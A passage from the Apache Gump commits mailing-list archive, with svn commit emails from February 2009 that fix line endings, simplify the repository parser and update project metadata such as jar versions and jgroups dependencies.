743223 URL: http://svn.apache.org/viewvc?rev=743223&view=rev Log: fix eol-style Modified: gump/trunk/python/gump/commands/__init__.py gump/trunk/python/gump/commands/build.py gump/trunk/python/gump/core/runner/__init__.py gump/trunk/python/gump/test/resources/full1/module6.xml (contents, props changed) gump/trunk/python/gump/test/resources/full1/module7.xml (contents, props changed) gump/trunk/python/gump/test/testExample.py gump/trunk/python/misc/pgrp.py (contents, props changed) gump/trunk/src/documentation/content/xdocs/bylaws.xml gump/trunk/src/documentation/content/xdocs/mail.xml Modified: gump/trunk/python/gump/commands/__init__.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/commands/__init__.py?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/gump/commands/__init__.py (original) +++ gump/trunk/python/gump/commands/__init__.py Wed Feb 11 04:52:05 2009 @@ -22,4 +22,4 @@ # tell Python what modules make up this package # NOTE: this is used by the command line processing routines so keep it up to date! -__all__ = ["env","build","check"] \ No newline at end of file +__all__ = ["env","build","check"] Modified: gump/trunk/python/gump/commands/build.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/commands/build.py?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/gump/commands/build.py (original) +++ gump/trunk/python/gump/commands/build.py Wed Feb 11 04:52:05 2009 @@ -52,4 +52,4 @@ # Perform this integration run... return getRunner(run).perform() - \ No newline at end of file + Modified: gump/trunk/python/gump/core/runner/__init__.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/runner/__init__.py?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/gump/core/runner/__init__.py (original) +++ gump/trunk/python/gump/core/runner/__init__.py Wed Feb 11 04:52:05 2009 @@ -26,4 +26,4 @@ behaviour like multithreading and/or which actors are run. Which runner to use is determined using the gump.runner.getRunner() method. -""" \ No newline at end of file +""" Modified: gump/trunk/python/gump/test/resources/full1/module6.xml URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/test/resources/full1/module6.xml?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/gump/test/resources/full1/module6.xml (original) +++ gump/trunk/python/gump/test/resources/full1/module6.xml Wed Feb 11 04:52:05 2009 @@ -1,27 +1,27 @@ -<module name="module6"> - - <url href="http://gump.apache.org/"/> - <description> - Module #6 - </description> - - <cvs repository="repository1"/> - - <project name="project6"> - <package>org.apache.project6</package> - - <depend project="project7"><noclasspath/></depend> - <depend project="alias1"><noclasspath/></depend> - - <home nested="dist"/> - <work nested="classes" /> - - <jar name="lib/output.jar" id="output"/> - - <license name="LICENSE"/> - - <nag from="Gump Integration Build &lt;[email protected]&gt;" - to="[email protected]"/> - </project> -</module> - +<module name="module6"> + + <url href="http://gump.apache.org/"/> + <description> + Module #6 + </description> + + <cvs repository="repository1"/> + + <project name="project6"> + <package>org.apache.project6</package> + + <depend project="project7"><noclasspath/></depend> + <depend project="alias1"><noclasspath/></depend> + + <home nested="dist"/> + <work nested="classes" /> + + <jar name="lib/output.jar" id="output"/> + + <license name="LICENSE"/> + + <nag from="Gump Integration Build &lt;[email protected]&gt;" + to="[email protected]"/> + </project> +</module> + Propchange: gump/trunk/python/gump/test/resources/full1/module6.xml ------------------------------------------------------------------------------ svn:eol-style = native Modified: gump/trunk/python/gump/test/resources/full1/module7.xml URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/test/resources/full1/module7.xml?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/gump/test/resources/full1/module7.xml (original) +++ gump/trunk/python/gump/test/resources/full1/module7.xml Wed Feb 11 04:52:05 2009 @@ -1,27 +1,27 @@ -<module name="module7"> - - <url href="http://gump.apache.org/"/> - <description> - Module #7 - </description> - - <cvs repository="repository1"/> - - <project name="project7"> - <package>org.apache.project7</package> - - <depend project="project6"><noclasspath/></depend> - <depend project="alias1"><noclasspath/></depend> - - <home nested="dist"/> - <work nested="classes" /> - - <jar name="lib/output.jar" id="output"/> - - <license name="LICENSE"/> - - <nag from="Gump Integration Build &lt;[email protected]&gt;" - to="[email protected]"/> - </project> -</module> - +<module name="module7"> + + <url href="http://gump.apache.org/"/> + <description> + Module #7 + </description> + + <cvs repository="repository1"/> + + <project name="project7"> + <package>org.apache.project7</package> + + <depend project="project6"><noclasspath/></depend> + <depend project="alias1"><noclasspath/></depend> + + <home nested="dist"/> + <work nested="classes" /> + + <jar name="lib/output.jar" id="output"/> + + <license name="LICENSE"/> + + <nag from="Gump Integration Build &lt;[email protected]&gt;" + to="[email protected]"/> + </project> +</module> + Propchange: gump/trunk/python/gump/test/resources/full1/module7.xml ------------------------------------------------------------------------------ svn:eol-style = native Modified: gump/trunk/python/gump/test/testExample.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/test/testExample.py?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/gump/test/testExample.py (original) +++ gump/trunk/python/gump/test/testExample.py Wed Feb 11 04:52:05 2009 @@ -51,4 +51,4 @@ # this allows us to run this test by itself from the commandline if __name__ == '__main__': - unittest.main() \ No newline at end of file + unittest.main() Modified: gump/trunk/python/misc/pgrp.py URL: http://svn.apache.org/viewvc/gump/trunk/python/misc/pgrp.py?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/python/misc/pgrp.py (original) +++ gump/trunk/python/misc/pgrp.py Wed Feb 11 04:52:05 2009 @@ -1,69 +1,69 @@ - -import os -import sys -import time -import logging -import signal - -def shutdownProcessAndProcessGroup(pid): - """ - Kill this group (i.e. instigator and all child processes). - """ - print 'Kill process group (anything launched by PID' + str(pid) + ')' - try: - pgrpID=os.getpgid(pid) - if -1 != pgrpID: - print 'Kill process group : (' + str(pgrpID) + ')' - os.killpg(pgrpID,signal.SIGHUP) - else: - print 'No such PID' + str(pid) + '.' - except Exception, details: - print 'Failed to dispatch signal ' + str(details) - -def hup(sig,stack): - print "HUP : %s:%s" % ( os.getpgrp(), os.getpid() ) - sys.exit(1) - -if __name__=='__main__': - forkPID = os.fork(); - - # Child gets PID = 0 - if 0 == forkPID: - - # Become a process group leader - os.setpgrp() - - signal.signal( signal.SIGHUP, hup ) - - # First Grandchild get's 0 - forkPID = os.fork() - - if 0 == forkPID: - os.fork() - os.fork() - os.fork() - os.system('sleep 100000') - else: - os.waitpid(forkPID,0) - - print 'Child Exit : %s' % os.getpid() - - # Parent gets real PID - else: - # Timeout support - timer = None - timeout = 10 - if timeout: - import threading - timer = threading.Timer(timeout, shutdownProcessAndProcessGroup, [forkPID]) - timer.start() - - # Run the command - waitcode = os.waitpid(forkPID,0) - - print 'Wait Code : %s : %s ' % ( waitcode, timer ) - - # Stop timer (if still running) - if timer and timer.isAlive(): timer.cancel() - - print 'Exit : %s:%s' % ( os.getpgrp(), os.getpid() ) \ No newline at end of file + +import os +import sys +import time +import logging +import signal + +def shutdownProcessAndProcessGroup(pid): + """ + Kill this group (i.e. instigator and all child processes). + """ + print 'Kill process group (anything launched by PID' + str(pid) + ')' + try: + pgrpID=os.getpgid(pid) + if -1 != pgrpID: + print 'Kill process group : (' + str(pgrpID) + ')' + os.killpg(pgrpID,signal.SIGHUP) + else: + print 'No such PID' + str(pid) + '.' + except Exception, details: + print 'Failed to dispatch signal ' + str(details) + +def hup(sig,stack): + print "HUP : %s:%s" % ( os.getpgrp(), os.getpid() ) + sys.exit(1) + +if __name__=='__main__': + forkPID = os.fork(); + + # Child gets PID = 0 + if 0 == forkPID: + + # Become a process group leader + os.setpgrp() + + signal.signal( signal.SIGHUP, hup ) + + # First Grandchild get's 0 + forkPID = os.fork() + + if 0 == forkPID: + os.fork() + os.fork() + os.fork() + os.system('sleep 100000') + else: + os.waitpid(forkPID,0) + + print 'Child Exit : %s' % os.getpid() + + # Parent gets real PID + else: + # Timeout support + timer = None + timeout = 10 + if timeout: + import threading + timer = threading.Timer(timeout, shutdownProcessAndProcessGroup, [forkPID]) + timer.start() + + # Run the command + waitcode = os.waitpid(forkPID,0) + + print 'Wait Code : %s : %s ' % ( waitcode, timer ) + + # Stop timer (if still running) + if timer and timer.isAlive(): timer.cancel() + + print 'Exit : %s:%s' % ( os.getpgrp(), os.getpid() ) Propchange: gump/trunk/python/misc/pgrp.py ------------------------------------------------------------------------------ svn:eol-style = native Modified: gump/trunk/src/documentation/content/xdocs/bylaws.xml URL: http://svn.apache.org/viewvc/gump/trunk/src/documentation/content/xdocs/bylaws.xml?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/src/documentation/content/xdocs/bylaws.xml (original) +++ gump/trunk/src/documentation/content/xdocs/bylaws.xml Wed Feb 11 04:52:05 2009 @@ -378,4 +378,4 @@ </section> </section> </body> -</document> \ No newline at end of file +</document> Modified: gump/trunk/src/documentation/content/xdocs/mail.xml URL: http://svn.apache.org/viewvc/gump/trunk/src/documentation/content/xdocs/mail.xml?rev=743223&r1=743222&r2=743223&view=diff ============================================================================== --- gump/trunk/src/documentation/content/xdocs/mail.xml (original) +++ gump/trunk/src/documentation/content/xdocs/mail.xml Wed Feb 11 04:52:05 2009 @@ -71,4 +71,4 @@ </section> </section> </body> -</document> \ No newline at end of file +</document> From [email protected] Wed Feb 11 04:55:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63870 invoked from network); 11 Feb 2009 04:55:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 04:55:23 -0000 Received: (qmail 3759 invoked by uid 500); 11 Feb 2009 04:55:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3750 invoked by uid 99); 11 Feb 2009 04:55:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 20:55:22 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 04:55:19 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 5EC802388A2E; Wed, 11 Feb 2009 04:54:58 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743224 - in /gump/metadata/project: antlr.xml args4j.xml axion.xml commons-el-10.xml d-haven.xml hibernate.xml ivy.xml maven2-ant-tasks.xml nlog4j.xml packaged-dom4j.xml saxpath.xml smartfrog-projects.xml struts-sslext.xml xml-xmlbeans.xml Date: Wed, 11 Feb 2009 04:54:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 04:54:50 2009 New Revision: 743224 URL: http://svn.apache.org/viewvc?rev=743224&view=rev Log: fix linefeeds Modified: gump/metadata/project/antlr.xml gump/metadata/project/args4j.xml gump/metadata/project/axion.xml gump/metadata/project/commons-el-10.xml gump/metadata/project/d-haven.xml gump/metadata/project/hibernate.xml gump/metadata/project/ivy.xml (contents, props changed) gump/metadata/project/maven2-ant-tasks.xml gump/metadata/project/nlog4j.xml gump/metadata/project/packaged-dom4j.xml gump/metadata/project/saxpath.xml gump/metadata/project/smartfrog-projects.xml (contents, props changed) gump/metadata/project/struts-sslext.xml gump/metadata/project/xml-xmlbeans.xml Modified: gump/metadata/project/antlr.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/antlr.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/antlr.xml (original) +++ gump/metadata/project/antlr.xml Wed Feb 11 04:54:50 2009 @@ -28,4 +28,4 @@ <!--jar name="antlrall.jar" id="antlr-tools"/--> <jar name="antlr.jar" id="antlr"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/args4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/args4j.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/args4j.xml (original) +++ gump/metadata/project/args4j.xml Wed Feb 11 04:54:50 2009 @@ -89,4 +89,4 @@ <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/axion.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/axion.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/axion.xml (original) +++ gump/metadata/project/axion.xml Wed Feb 11 04:54:50 2009 @@ -26,4 +26,4 @@ <jar name="axion-1.0-M2.jar"/> <license name="LICENSE.txt"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/commons-el-10.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/commons-el-10.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/commons-el-10.xml (original) +++ gump/metadata/project/commons-el-10.xml Wed Feb 11 04:54:50 2009 @@ -22,4 +22,4 @@ <jar name="commons-el.jar"/> <license name="LICENSE"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/d-haven.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/d-haven.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/d-haven.xml (original) +++ gump/metadata/project/d-haven.xml Wed Feb 11 04:54:50 2009 @@ -31,4 +31,4 @@ <jar name="managed-pool.jar"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/hibernate.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/hibernate.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/hibernate.xml (original) +++ gump/metadata/project/hibernate.xml Wed Feb 11 04:54:50 2009 @@ -27,4 +27,4 @@ <jar name="hibernate2.jar"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/ivy.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ivy.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/ivy.xml (original) +++ gump/metadata/project/ivy.xml Wed Feb 11 04:54:50 2009 @@ -63,7 +63,7 @@ <depend project="ivy" inherit="runtime"/> <depend project="junit"/> <depend project="commons-lang"/> - <depend project="commons-vfs" inherit="all" /> + <depend project="commons-vfs" inherit="all" /> <depend project="ant-testutil" /> <work nested="build/test" /> <license name="LICENSE"/> Propchange: gump/metadata/project/ivy.xml ------------------------------------------------------------------------------ svn:eol-style = native Modified: gump/metadata/project/maven2-ant-tasks.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/maven2-ant-tasks.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/maven2-ant-tasks.xml (original) +++ gump/metadata/project/maven2-ant-tasks.xml Wed Feb 11 04:54:50 2009 @@ -22,4 +22,4 @@ <project name="maven2-ant-tasks"> <jar name="maven-artifact-ant-2.0-alpha-3-dep.jar"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/nlog4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/nlog4j.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/nlog4j.xml (original) +++ gump/metadata/project/nlog4j.xml Wed Feb 11 04:54:50 2009 @@ -55,4 +55,4 @@ <depend project="xml-xerces"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/packaged-dom4j.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/packaged-dom4j.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/packaged-dom4j.xml (original) +++ gump/metadata/project/packaged-dom4j.xml Wed Feb 11 04:54:50 2009 @@ -27,4 +27,4 @@ <jar name="dom4j-full.jar"/> <license name="doc/license.html"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/saxpath.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/saxpath.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/saxpath.xml (original) +++ gump/metadata/project/saxpath.xml Wed Feb 11 04:54:50 2009 @@ -23,4 +23,4 @@ <package>org.saxpath</package> <jar name="saxpath.jar"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/smartfrog-projects.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/smartfrog-projects.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/smartfrog-projects.xml (original) +++ gump/metadata/project/smartfrog-projects.xml Wed Feb 11 04:54:50 2009 @@ -70,4 +70,4 @@ </module> - \ No newline at end of file + Propchange: gump/metadata/project/smartfrog-projects.xml ------------------------------------------------------------------------------ svn:eol-style = native Modified: gump/metadata/project/struts-sslext.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/struts-sslext.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/struts-sslext.xml (original) +++ gump/metadata/project/struts-sslext.xml Wed Feb 11 04:54:50 2009 @@ -45,4 +45,4 @@ <depend project="jsse"/> <jar name="web/WEB-INF/lib/sslext.jar"/> </project> -</module> \ No newline at end of file +</module> Modified: gump/metadata/project/xml-xmlbeans.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-xmlbeans.xml?rev=743224&r1=743223&r2=743224&view=diff ============================================================================== --- gump/metadata/project/xml-xmlbeans.xml (original) +++ gump/metadata/project/xml-xmlbeans.xml Wed Feb 11 04:54:50 2009 @@ -49,4 +49,4 @@ from="Robert Burrell Donkin &lt;[email protected]&gt;"/> </project> -</module> \ No newline at end of file +</module> From [email protected] Wed Feb 11 05:38:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82242 invoked from network); 11 Feb 2009 05:38:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 05:38:18 -0000 Received: (qmail 38098 invoked by uid 500); 11 Feb 2009 05:38:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38089 invoked by uid 99); 11 Feb 2009 05:38:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 21:38:18 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 05:38:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 415D023888F4; Wed, 11 Feb 2009 05:37:55 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743237 - /gump/trunk/python/gump/core/model/repository.py Date: Wed, 11 Feb 2009 05:37:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 05:37:52 2009 New Revision: 743237 URL: http://svn.apache.org/viewvc?rev=743237&view=rev Log: simplify repository parser Modified: gump/trunk/python/gump/core/model/repository.py Modified: gump/trunk/python/gump/core/model/repository.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/model/repository.py?rev=743237&r1=743236&r2=743237&view=diff ============================================================================== --- gump/trunk/python/gump/core/model/repository.py (original) +++ gump/trunk/python/gump/core/model/repository.py Wed Feb 11 05:37:52 2009 @@ -38,10 +38,17 @@ self.url=None + typeToLabel = {'cvs':'CVS', 'svn':'Subversion', 'artifact':'Artifact', + 'p4':'Perforce', 'git':'Git'} + type=self.getDomAttributeValue('type') + try: + self.type = typeToLabel[type] + except: + raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) + if 'cvs'==type: - self.type='CVS' self.web=self.getDomChildValue('cvsweb') or \ self.getDomChildValue('web') if self.hasDomChild('root'): @@ -52,40 +59,24 @@ self.path=getDomChildValue(root,'path') self.hostname=getDomChildValue(root,'hostname') else: - raise RuntimeError, 'No XML <root on repository: ' + self.getName() - elif 'svn'==type: - self.type='Subversion' - if self.hasDomChild('url'): - self.url=self.getDomChildValue('url') - else: - raise RuntimeError, 'No URL on SVN repository: ' + self.getName() - self.web=self.getDomChildValue('web') - self.user=self.getDomChildValue('user') - self.password=self.getDomChildValue('password') - elif 'artifact'==type: - self.type='Artifacts' - if self.hasDomChild('url'): - self.url=self.getDomChildValue('url') - else: - raise RuntimeError, 'No URL on Jars repository: ' + self.getName() - self.web=self.getDomChildValue('web') + raise RuntimeError, 'No XML <root on repository: ' \ + + self.getName() elif 'p4'==type: - self.type='Perforce' if self.hasDomChild('root'): root=self.getDomChild('root') self.p4port=getDomChildValue(root,'hostname') else: raise RuntimeError, 'No Perforce server on P4 repository: ' + self.getName() self.web=self.getDomChildValue('web') - elif 'git'==type: - self.type='Git' + else: if self.hasDomChild('url'): self.url=self.getDomChildValue('url') else: - raise RuntimeError, 'No URL on GIT repository: ' + self.getName() + raise RuntimeError, 'No URL on ' + self.type + ' repository: ' \ + + self.getName() self.web=self.getDomChildValue('web') - else: - raise RuntimeError, 'Invalid Repository Type:' + str(xml.type) + self.user=self.getDomChildValue('user') + self.password=self.getDomChildValue('password') # Modules referencing this repository self.modules=[] From [email protected] Wed Feb 11 07:51:39 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54834 invoked from network); 11 Feb 2009 07:51:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 07:51:39 -0000 Received: (qmail 35671 invoked by uid 500); 11 Feb 2009 07:51:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35662 invoked by uid 99); 11 Feb 2009 07:51:39 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 23:51:39 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 07:51:38 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7161023888F4; Wed, 11 Feb 2009 07:51:18 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743262 - /gump/metadata/project/castor.xml Date: Wed, 11 Feb 2009 07:51:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 07:51:18 2009 New Revision: 743262 URL: http://svn.apache.org/viewvc?rev=743262&view=rev Log: bump jar version Modified: gump/metadata/project/castor.xml Modified: gump/metadata/project/castor.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/castor.xml?rev=743262&r1=743261&r2=743262&view=diff ============================================================================== --- gump/metadata/project/castor.xml (original) +++ gump/metadata/project/castor.xml Wed Feb 11 07:51:18 2009 @@ -29,8 +29,8 @@ <package>org.exolab.castor</package> <depend project="castor-core"/> <depend project="castor-xml"/> - <jar name="core/target/castor-core-1.3rc2-SNAPSHOT.jar"/> - <jar name="xml/target/castor-xml-1.3rc2-SNAPSHOT.jar"/> + <jar name="core/target/castor-core-1.3.1-SNAPSHOT.jar"/> + <jar name="xml/target/castor-xml-1.3.1-SNAPSHOT.jar"/> </project> <project name="castor-core"> @@ -46,7 +46,7 @@ <option project="junit"/> <option project="logging-log4j-12"/> <option project="commons-lang"/> - <jar name="core/target/castor-core-1.3rc2-SNAPSHOT.jar"/> + <jar name="core/target/castor-core-1.3.1-SNAPSHOT.jar"/> </project> <!-- will be removed if tests pass --> @@ -76,7 +76,7 @@ <option project="jakarta-regexp"/> <option project="jakarta-oro"/> <option project="ant" inherit="runtime"/> - <jar name="xml/target/castor-xml-1.3rc2-SNAPSHOT.jar"/> + <jar name="xml/target/castor-xml-1.3.1-SNAPSHOT.jar"/> </project> <!-- will be removed if tests pass --> From [email protected] Wed Feb 11 07:53:44 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56232 invoked from network); 11 Feb 2009 07:53:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 07:53:43 -0000 Received: (qmail 35985 invoked by uid 500); 11 Feb 2009 07:53:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35976 invoked by uid 99); 11 Feb 2009 07:53:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 10 Feb 2009 23:53:43 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 07:53:41 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id AE010238896F; Wed, 11 Feb 2009 07:53:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743264 - /gump/metadata/project/jgroups.xml Date: Wed, 11 Feb 2009 07:53:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 07:53:20 2009 New Revision: 743264 URL: http://svn.apache.org/viewvc?rev=743264&view=rev Log: help jgroups find its schema generator Modified: gump/metadata/project/jgroups.xml Modified: gump/metadata/project/jgroups.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jgroups.xml?rev=743264&r1=743263&r2=743264&view=diff ============================================================================== --- gump/metadata/project/jgroups.xml (original) +++ gump/metadata/project/jgroups.xml Wed Feb 11 07:53:20 2009 @@ -44,6 +44,8 @@ <jar name="dist/jgroups-all.jar"/> + <work nested="classes"/> + <javadoc nested="dist/javadoc"/> <nag to="[email protected]" From [email protected] Wed Feb 11 17:31:09 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52228 invoked from network); 11 Feb 2009 17:31:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Feb 2009 17:31:09 -0000 Received: (qmail 67661 invoked by uid 500); 11 Feb 2009 17:31:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67576 invoked by uid 99); 11 Feb 2009 17:31:00 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 09:31:00 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 11 Feb 2009 17:30:59 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4F1DE23888F1; Wed, 11 Feb 2009 17:30:39 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r743417 - /gump/metadata/project/jgroups.xml Date: Wed, 11 Feb 2009 17:30:38 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Wed Feb 11 17:30:38 2009 New Revision: 743417 URL: http://svn.apache.org/viewvc?rev=743417&view=rev Log: jgroups needs Xalan now Modified: gump/metadata/project/jgroups.xml Modified: gump/metadata/project/jgroups.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/jgroups.xml?rev=743417&r1=743416&r2=743417&view=diff ============================================================================== --- gump/metadata/project/jgroups.xml (original) +++ gump/metadata/project/jgroups.xml Wed Feb 11 17:30:38 2009 @@ -30,6 +30,7 @@ <ant target="jar"/> <depend project="ant" inherit="runtime"/> <depend project="xml-apis"/> + <depend project="xalan"/> <depend project="xml-xerces"/> <depend project="bsh"/> From [email protected] Thu Feb 12 03:28:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28446 invoked from network); 12 Feb 2009 03:28:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) 